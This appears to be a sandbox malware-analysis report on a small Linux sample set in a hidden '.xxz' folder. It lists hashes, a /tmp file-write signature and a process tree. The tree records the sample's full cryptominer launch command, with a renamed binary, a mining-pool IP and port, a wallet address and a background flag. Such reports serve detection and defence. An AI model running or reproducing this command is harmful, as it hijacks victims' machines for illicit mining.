Analysis
-
max time kernel
0s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18-05-2024 02:29
Behavioral task
behavioral1
Sample
.xxz/h32
Resource
ubuntu2004-amd64-20240508-en
Behavioral task
behavioral2
Sample
.xxz/h64
Resource
ubuntu2004-amd64-20240508-en
Behavioral task
behavioral3
Sample
.xxz/md
Resource
ubuntu2004-amd64-20240508-en
Behavioral task
behavioral4
Sample
.xxz/run
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral5
Sample
.xxz/run
Resource
debian9-armhf-20240226-en
Behavioral task
behavioral6
Sample
.xxz/run
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral7
Sample
.xxz/run
Resource
debian9-mipsel-20240226-en
General
-
Target
.xxz/run
-
Size
495B
-
MD5
dfc728a7c269d566af9049b916fb7289
-
SHA1
2f6b58bb8e2f3a84841c278922aff076ef1c191d
-
SHA256
77ad3f8ab8742bcbe204136eb2c49f435d582be9c5a05287b527944f33549a28
-
SHA512
6c05f0bb3122bdd22eae397f6b1788f4eabc28dec94818c83f4da90763a967af9c4891dc04f6cfd2732b85e2d82dda1817476aadcab1ddabed6a4321844665e6
Malware Config
Signatures
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
rundescription ioc process File opened for modification /tmp/.xxz/bash.pid run
Processes
-
/tmp/.xxz/run/tmp/.xxz/run1⤵
- Writes file to tmp directory
-
/usr/bin/nprocnproc2⤵
-
/bin/unameuname -m2⤵
-
/tmp/.xxz/h64./h64 -s xxxdz ./md -o 107.191.99.95:3333 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B1⤵